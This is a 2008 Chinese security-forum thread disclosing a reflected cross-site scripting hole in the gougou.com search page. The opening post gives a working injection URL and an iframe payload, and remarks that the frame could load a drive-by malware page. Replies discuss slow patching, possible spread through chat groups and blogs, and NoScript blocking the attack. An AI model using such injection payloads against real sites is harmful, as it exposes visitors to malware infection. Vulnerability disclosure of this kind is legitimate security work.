查看: 14139|回复: 10
收起左侧

[其它] [迅雷旗下狗狗搜索]hxxp://www.gougou.com[XSS]

[复制链接]
雨宫优子
发表于 2008-12-18 20:08:03 | 显示全部楼层 |阅读模式
漏洞发现好久了,居然一直没修补...

示例网址,没有任何问题,打开会看到卡饭论坛主页在搜索内容框中:
http://www.gougou.com/search?search=%3Ciframe%20src%3Dhttp%3A%2F%2Fbbs.kafan.cn%2F%20width%3D1000%20height%3D700%3E%3C%2Fiframe%3E&restype=-1&id=10000001&ty=0&pattern=0

地址:http://www.gougou.com/
搜索:

  1. <iframe src=http://bbs.kafan.cn/ width=1000 height=700></iframe>
复制代码
当然也可以把卡饭改成其他的,比如改成病毒挂马页,你打开就会中毒,不止这些用处呢......

[ 本帖最后由 aarwwefdds 于 2008-12-18 20:20 编辑 ]
qianwenxiang
发表于 2008-12-18 20:14:25 | 显示全部楼层
这些个玩意不通知站长等半年都不一定会修复...
fireworld
发表于 2008-12-18 20:47:57 | 显示全部楼层
~~~如果这个东西流行在QQ群里 或者博客
BING126
头像被屏蔽
发表于 2008-12-18 21:02:46 | 显示全部楼层
火狐报了。。
1.jpg

评分

参与人数 1经验 +1 收起 理由
jimmyleo + 1 很好地符合回帖宗旨 :-)

查看全部评分

jimmyleo
发表于 2008-12-18 21:07:32 | 显示全部楼层
原帖由 BING126 于 2008-12-18 21:02 发表
火狐报了。。


noscript的确在安全性上做得很好 但是以牺牲易用性为前提了 不喜欢..
wyx5385365
发表于 2008-12-20 04:31:55 | 显示全部楼层

回复 4楼 BING126 的帖子

你好  请问你用的是哪个版本的火狐

为什么我的火狐不报呢?我的是最新版的
fcerebel
发表于 2008-12-20 18:28:00 | 显示全部楼层

回复 6楼 wyx5385365 的帖子

请问你安装了Noscript了吗?
我也装了NS,但是没有报
Oo右手oO
发表于 2008-12-20 18:35:12 | 显示全部楼层

回复 6楼 wyx5385365 的帖子

他装了noscipt插件
BING126
头像被屏蔽
发表于 2008-12-20 21:55:14 | 显示全部楼层
我用的是Firefox 3.0.5   NoScript很强大  能阻止未知脚本攻击。。
插件下载:http://addons.sociz.com/firefox/36/
wyx5385365
发表于 2008-12-21 00:14:08 | 显示全部楼层
原帖由 BING126 于 2008-12-20 21:55 发表
我用的是Firefox 3.0.5   NoScript很强大  能阻止未知脚本攻击。。
插件下载:http://addons.sociz.com/firefox/36/




谢谢  又学习了

[ 本帖最后由 wyx5385365 于 2008-12-21 00:15 编辑 ]
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 08:30 , Processed in 0.135131 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表